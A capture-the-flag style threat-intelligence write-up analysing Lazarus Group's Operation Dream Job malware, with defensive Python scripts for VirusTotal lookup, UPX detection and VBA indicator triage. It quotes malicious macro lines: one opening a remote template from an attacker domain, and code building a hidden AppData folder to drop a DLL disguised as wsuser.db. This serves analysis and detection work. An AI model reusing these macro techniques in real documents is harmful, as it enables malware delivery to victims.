
Dream Job-2 Sherlock Scenario


Description

As a Threat Intelligence Analyst investigating Operation Dream Job, you have identified that the Lazarus Group utilized a variety of custom-built malware and tools to facilitate their operations. Your task is to analyze and gather intelligence on the malware utilized by this APT.

Files provided:

  • 17.dotm — Malicious Word template with VBA macro
  • BAE_HPC_SE.iso — ISO file containing trojanized SumatraPDF
  • Salary_Lockheed_Martin_job_opportunities_confidential.doc — Phishing document with VBA macro
  • Password for inner ZIP: Dvn62WlNrt09

Analysis

This is a 13-task Sherlock scenario combining MITRE ATT&CK threat intelligence research, malware artifact forensics, and OSINT to investigate the Lazarus Group's Operation Dream Job campaign. The challenge requires analyzing two custom malware families (DRATzarus, Torisma) via MITRE ATT&CK, performing forensic analysis on an ISO-delivered trojanized executable, and extracting intelligence from malicious VBA macros in Office documents.

Attack Overview

Operation Dream Job is a Lazarus Group campaign targeting defense and aerospace employees with fake job offers. The attack chain:

  1. Phishing — Victims receive documents like Salary_Lockheed_Martin_job_opportunities_confidential.doc with embedded VBA macros
  2. Payload delivery — Macros fetch remote templates or drop DLLs; ISO files deliver trojanized legitimate software
  3. Execution — Trojanized SumatraPDF (InternalViewer.exe), DLL sideloading via wsuser.db
  4. C2 — Custom malware (DRATzarus, Torisma) with encrypted communications

Key Malware Families

Malware     MITRE ID   Key Trait
DRATzarus   S0694      Similar to Bankshot; uses IsDebuggerPresent for anti-debug
Torisma     S0678      C2 encrypted with XOR + VEST-32; packed with LZ4 compression

Solution

Part 1: MITRE ATT&CK Intelligence (Tasks 1-4)

Task 1: What previously known malware does DRATzarus share similarities with?

Answer: Bankshot

From MITRE ATT&CK page for DRATzarus (S0694): "DRATzarus shares similarities with Bankshot, which was used by Lazarus Group in 2017 to target the Turkish financial sector."

Task 2: Which Windows API function does DRATzarus use to detect a debugger?

Answer: IsDebuggerPresent

From S0694 under technique T1622 (Debugger Evasion): "DRATzarus can use IsDebuggerPresent to detect whether a debugger is present on a victim."

Task 3: Torisma encrypted its C2 communications using XOR and which other method?

Answer: VEST-32

From MITRE ATT&CK page for Torisma (S0678) under T1573.001 (Encrypted Channel: Symmetric Cryptography): "Torisma has encrypted its C2 communications using XOR and VEST-32."

Task 4: Which packing method has been used to obfuscate Torisma?

Answer: lz4 compression

From S0678 under T1027.002 (Software Packing): "Torisma has been packed with lz4 compression."

Note: On the MITRE page, "lz4" may render as "Iz4" due to font rendering — the lowercase 'l' looks like uppercase 'I'. This is the well-known LZ4 compression algorithm.


Part 2: ISO Forensic Analysis (Tasks 5-8)

Task 5: Identify the executable contained within the ISO file

Answer: InternalViewer.exe

hdiutil mount BAE_HPC_SE.iso
ls -la /Volumes/BAE_HPC_SE/

Contents:

BAE_HPC_SE.pdf      (226,846 bytes — decoy PDF)
InternalViewer.exe  (10,507,264 bytes — PE32+ x86-64)

Task 6: What was the original name of the executable?

Answer: SumatraPDF.exe

import pefile

pe = pefile.PE("InternalViewer.exe")
# pefile exposes VS_VERSIONINFO as a list of lists; the StringFileInfo block
# carries OriginalFilename, ProductName, CompanyName and friends.
# UPX leaves .rsrc uncompressed, so this works on the packed binary as-is.
for entry in pe.FileInfo[0]:
    if entry.Key == b'StringFileInfo':
        for st in entry.StringTable:
            for key, val in st.entries.items():
                print(f"{key.decode()}: {val.decode()}")

Output:

OriginalFilename: SumatraPDF.exe
ProductName: SumatraPDF
FileVersion: 3.2
CompanyName: Krzysztof Kowalczyk

Task 7: When was the EXE First Seen In The Wild on VirusTotal? (UTC)

Answer: 2020-08-13 08:44:50

import hashlib

# Hash the sample so it can be looked up on VirusTotal without uploading it
with open("InternalViewer.exe", "rb") as f:
    sha256 = hashlib.sha256(f.read()).hexdigest()
# SHA256: adce894e3ce69c9822da57196707c7a15acee11319ccc963b84d83c23c3ea802

Queried VirusTotal API — first_seen_itw_date field returned 2020-08-13 08:44:50 UTC.

Additional VT info:

  • first_submission_date: 2020-06-05 09:20:22
  • PE compilation timestamp: 2020-05-12 19:26:17
  • Classification: trojan.nukesped/lazarus
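The hash-and-lookup step above can be scripted end to end. The block below is an added example, not part of the writeup: it hashes a file in chunks, fetches the VirusTotal v3 file object for that hash (only when a VT_API_KEY environment variable is set), and converts the epoch fields first_seen_itw_date, first_submission_date and last_analysis_date into the UTC strings the task asks for. The embedded SAMPLE_REPORT is constructed; its timestamps are chosen to match the dates quoted in this task so the script runs offline.

```python
import hashlib
import json
import os
import sys
from datetime import datetime, timezone
from urllib.request import Request, urlopen

# VirusTotal API v3 "file object" endpoint, keyed by SHA-256 (or MD5/SHA-1)
VT_FILE_URL = "https://www.virustotal.com/api/v3/files/{}"

# Epoch-second fields in the file object that analysts usually want as UTC dates
DATE_FIELDS = ("first_seen_itw_date", "first_submission_date", "last_analysis_date")


def sha256_of_file(path, chunk=1 << 20):
    """Hash a file incrementally so large samples (this one is 10 MB) do not need to sit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def fetch_vt_report(sha256, api_key):
    """GET the file object for a hash; VT authenticates with the x-apikey header."""
    req = Request(VT_FILE_URL.format(sha256), headers={"x-apikey": api_key})
    with urlopen(req, timeout=30) as resp:
        return json.load(resp)


def _utc(epoch_seconds):
    # VT stores timestamps as UTC epoch integers; render them the way the task expects
    return datetime.fromtimestamp(epoch_seconds, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def summarize_vt_report(report):
    """Pull the dates, detection count and suggested label out of a v3 file object."""
    attrs = report["data"]["attributes"]
    summary = {field: _utc(attrs[field]) for field in DATE_FIELDS if field in attrs}
    stats = attrs.get("last_analysis_stats", {})
    summary["malicious_engines"] = stats.get("malicious", 0)
    summary["suggested_label"] = attrs.get("popular_threat_classification", {}).get(
        "suggested_threat_label"
    )
    return summary


# Constructed stand-in for a VT response (not real API output). The epoch values
# equal 2020-08-13 08:44:50 UTC and 2020-06-05 09:20:22 UTC, the dates quoted above.
SAMPLE_REPORT = {
    "data": {
        "attributes": {
            "first_seen_itw_date": 1597308290,
            "first_submission_date": 1591348822,
            "last_analysis_stats": {"malicious": 55, "undetected": 10},
            "popular_threat_classification": {"suggested_threat_label": "trojan.nukesped/lazarus"},
        }
    }
}


if __name__ == "__main__":
    api_key = os.environ.get("VT_API_KEY")
    if len(sys.argv) > 1 and api_key:
        digest = sha256_of_file(sys.argv[1])
        print(f"sha256: {digest}")
        report = fetch_vt_report(digest, api_key)
    else:
        report = SAMPLE_REPORT  # offline demo
    for key, value in summarize_vt_report(report).items():
        print(f"{key}: {value}")
```

Looking a hash up rather than uploading the file is the safer default when the sample may be sensitive to the victim organisation: a hash query reveals nothing to VT that it does not already have.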

Task 8: What packer was used to pack the executable? (Full name)

Answer: Ultimate Packer for eXecutables

PE section analysis reveals characteristic UPX sections:

Section   VirtualSize   RawSize
UPX0      34,689,024    0          (empty — decompression target)
UPX1      10,465,280    10,463,744 (compressed code)
.rsrc     45,056        42,496     (resources)

The pattern of UPX0 with zero raw size and UPX1 containing the compressed payload is the signature of UPX, the Ultimate Packer for eXecutables.
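The section-table reasoning above can be turned into a check that does not depend on pefile. The following block is an added example, not code from the writeup: it parses the PE section headers directly with struct, then applies the two UPX indicators the task relies on (UPX-named sections, and an empty first section that reserves a large virtual range followed by a section whose raw size almost equals its virtual size). The build_image() helper and the UPX_SAMPLE / CLEAN_SAMPLE rows are constructed so the script runs offline; UPX_SAMPLE copies the sizes listed in the table above, and the synthetic headers contain no code.

```python
import struct
import sys

# IMAGE_SECTION_HEADER (40 bytes): Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)  # 40


def parse_sections(image):
    """Walk MZ -> e_lfanew -> PE\\0\\0 -> COFF header -> section table and return name/size rows."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]       # NumberOfSections
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + size_of_optional                               # COFF header is 20 bytes
    sections = []
    for i in range(num_sections):
        f = struct.unpack_from(SECTION_HEADER_FMT, image, table + i * SECTION_HEADER_SIZE)
        sections.append({
            "name": f[0].rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": f[1],
            "raw_size": f[3],
        })
    return sections


def upx_indicators(sections):
    """Return the packing indicators visible in the section table (empty list = nothing seen)."""
    findings = []
    if any(s["name"].upper().startswith("UPX") for s in sections):
        findings.append("UPX-named sections present")
    if not sections:
        return findings
    first = sections[0]
    if first["raw_size"] == 0 and first["virtual_size"] > 0:
        findings.append(f"{first['name']} has no raw data but reserves "
                        f"{first['virtual_size']} virtual bytes (unpacking target)")
    if len(sections) >= 2 and first["raw_size"] == 0:
        second = sections[1]
        # A compressed blob is stored 1:1, so raw size sits within ~1% of virtual size
        if second["raw_size"] > 0 and abs(second["virtual_size"] - second["raw_size"]) <= second["virtual_size"] * 0.01:
            findings.append(f"{second['name']} holds {second['raw_size']} raw bytes next to the empty section (compressed payload)")
    return findings


def looks_upx_packed(sections):
    """Two or more indicators together are the UPX layout; a name alone can be spoofed or renamed."""
    return len(upx_indicators(sections)) >= 2


def build_image(rows):
    """Constructed minimal PE32+ header carrying the given (name, virtual_size, raw_size) rows; no code inside."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, len(rows), 0, 0, 0, 240, 0x22)  # AMD64, 240-byte optional header
    optional = struct.pack("<H", 0x20B).ljust(240, b"\0")       # PE32+ magic, rest zeroed
    table, va, raw_ptr = b"", 0x1000, 0x400
    for name, vsize, rsize in rows:
        table += struct.pack(SECTION_HEADER_FMT, name.encode().ljust(8, b"\0"), vsize, va, rsize,
                             raw_ptr if rsize else 0, 0, 0, 0, 0, 0xE0000080)
        va += (vsize + 0xFFF) & ~0xFFF
        raw_ptr += rsize
    return dos + b"PE\0\0" + coff + optional + table


# Constructed samples: the first copies the InternalViewer.exe section sizes from the table above
UPX_SAMPLE = [("UPX0", 34_689_024, 0), ("UPX1", 10_465_280, 10_463_744), (".rsrc", 45_056, 42_496)]
CLEAN_SAMPLE = [(".text", 9_000_000, 9_000_448), (".rdata", 2_000_000, 2_000_384),
                (".data", 500_000, 120_000), (".rsrc", 45_056, 45_056)]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            targets = {sys.argv[1]: parse_sections(fh.read())}
    else:
        targets = {"upx-sample": parse_sections(build_image(UPX_SAMPLE)),
                   "clean-sample": parse_sections(build_image(CLEAN_SAMPLE))}
    for label, secs in targets.items():
        print(f"{label}: packed={looks_upx_packed(secs)}")
        for finding in upx_indicators(secs):
            print(f"  - {finding}")
```

The second and third indicators are the ones worth keeping in a detection rule: renaming UPX0/UPX1 is a one-line change for an attacker, but the empty-section-plus-dense-blob shape is what the UPX stub needs at runtime and survives the rename.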


Part 3: VBA Macro Analysis — Salary Document (Tasks 9-11)

Task 9: What is the full URL found within the macro?

Answer: https://markettrendingcenter.com/lk_job_oppor.docx

python3 -m oletools.olevba Salary_Lockheed_Martin_job_opportunities_confidential.doc

In the Frame1_Layout() subroutine:

Application.Documents.Open ("https://markettrendingcenter.com/lk_job_oppor.docx")

The macro also contained:

  • Heavy shellcode (Base64-encoded in MediaSection array)
  • WMVCORE.DLL loading
  • API calls: VirtualProtect, memcpy, NtQueryInformationProcess
  • In-memory code execution capability

Task 10: Who is the author of the document?

Answer: Mickey

exiftool Salary_Lockheed_Martin_job_opportunities_confidential.doc

Output: Author: Mickey

Task 11: Who last modified the document?

Answer: Challenger

From exiftool output:

Last Modified By: Challenger
Last Saved Date: 2021-10-18 13:06:00
Revision Number: 83

Part 4: VBA Macro Analysis — 17.dotm (Tasks 12-13)

Task 12: What is the directory where a suspicious folder was created?

Answer: \AppData\Local\Microsoft\Notice

python3 -m oletools.olevba 17.dotm

In the GetDllName() function (Module1.bas):

workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice"
If Not FolderExist(workDir) Then
    MkDir (workDir)
End If

Task 13: Which suspicious file was checked for existence in that directory?

Answer: wsuser.db

In the same GetDllName() function:

binName = "wsuser.db"
dllPath = workDir & "\" & binName
Do While FileExist(dllPath)
    ...
Loop

The full attack chain in this macro:

  1. Creates \AppData\Local\Microsoft\Notice\ directory
  2. Checks if wsuser.db exists
  3. Extracts a DLL payload (Base64-decoded from UserForm1 labels)
  4. Saves it as wsuser.db (DLL disguised as SQLite database)
  5. Loads via LoadLibraryA
  6. Calls exported function sqlite3_stmt_all — a malicious export masquerading as a legitimate SQLite function
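Tasks 9 through 13 all come down to reading indicators out of olevba output: URLs, paths built from Environ(), dropped filenames, declared Win32 imports and auto-executing procedures. The block below is an added example, not code from the writeup or from oletools: a small regex-based triage pass you can point at the VBA source that olevba prints. SAMPLE_VBA is constructed from the snippets quoted above (the Frame1_Layout() download, the GetDllName() path and wsuser.db logic, and the API names listed for the salary document); the Declare lines and the AutoOpen stub are assumed shapes, not the real macro text.

```python
import re
import sys

# Constructed VBA fragment assembled from the snippets quoted in this writeup; not the real macro source
SAMPLE_VBA = r'''
Private Declare PtrSafe Function VirtualProtect Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long
Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
Private Declare PtrSafe Function NtQueryInformationProcess Lib "ntdll" (ByVal hProcess As LongPtr, ByVal cls As Long, info As Any, ByVal cb As Long, retLen As Long) As Long
Private Declare PtrSafe Sub memcpy Lib "kernel32" Alias "RtlMoveMemory" (dst As Any, src As Any, ByVal n As Long)

Private Sub Frame1_Layout()
    Application.Documents.Open ("https://markettrendingcenter.com/lk_job_oppor.docx")
End Sub

Function GetDllName() As String
    workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice"
    If Not FolderExist(workDir) Then
        MkDir (workDir)
    End If
    binName = "wsuser.db"
    dllPath = workDir & "\" & binName
    GetDllName = dllPath
End Function

Sub AutoOpen()
    hMod = LoadLibraryA("WMVCORE.DLL")
End Sub
'''

URL_RE = re.compile(r'https?://[^\s"\')]+')
# Environ("VAR") & "\relative\path"  ->  the drop directory the macro builds at runtime
ENV_PATH_RE = re.compile(r'Environ\("(\w+)"\)\s*&\s*"([^"]+)"')
# Quoted bare filenames with extensions that matter for droppers/loaders
FILENAME_RE = re.compile(r'"([\w\-]+\.(?:db|dll|exe|docx?|dotm|dat|tmp))"', re.I)
# Declare [PtrSafe] Function|Sub NAME Lib "LIB" [Alias "REAL"]
DECLARE_RE = re.compile(r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?', re.I)
PROC_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)', re.M | re.I)

# Imports that only make sense if the macro is about to run code it carries itself
SUSPICIOUS_APIS = {"VirtualProtect", "VirtualAlloc", "VirtualAllocEx", "LoadLibraryA", "LoadLibraryW",
                   "GetProcAddress", "NtQueryInformationProcess", "memcpy", "CreateThread",
                   "WriteProcessMemory", "CallWindowProcA", "EnumSystemLocalesA"}
AUTO_EXEC = {"autoopen", "auto_open", "document_open", "autoexec", "autoclose", "document_close", "workbook_open"}


def triage_vba(source):
    """Extract the indicators an analyst reads off olevba output into one dict."""
    declared = {name: (lib, alias or None) for name, lib, alias in DECLARE_RE.findall(source)}
    procs = PROC_RE.findall(source)
    return {
        "urls": sorted(set(URL_RE.findall(source))),
        "paths": sorted({f"%{var}%{path}" for var, path in ENV_PATH_RE.findall(source)}),
        "filenames": sorted(set(FILENAME_RE.findall(source))),
        "imports": declared,
        "suspicious_apis": sorted(name for name in declared if name in SUSPICIOUS_APIS),
        "procedures": procs,
        "auto_exec": [p for p in procs if p.lower() in AUTO_EXEC],
    }


if __name__ == "__main__":
    # Feed it olevba's printed VBA source, or run with no argument for the constructed sample
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_VBA
    for key, value in triage_vba(text).items():
        print(f"{key}: {value}")
```

The paths and filenames this yields (here %UserProfile%\AppData\Local\Microsoft\Notice and wsuser.db) translate directly into endpoint detections: a file-creation rule for that directory, and a sysmon ImageLoad rule for a .db file loaded as a module, which is what a DLL disguised as a SQLite database looks like at runtime.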
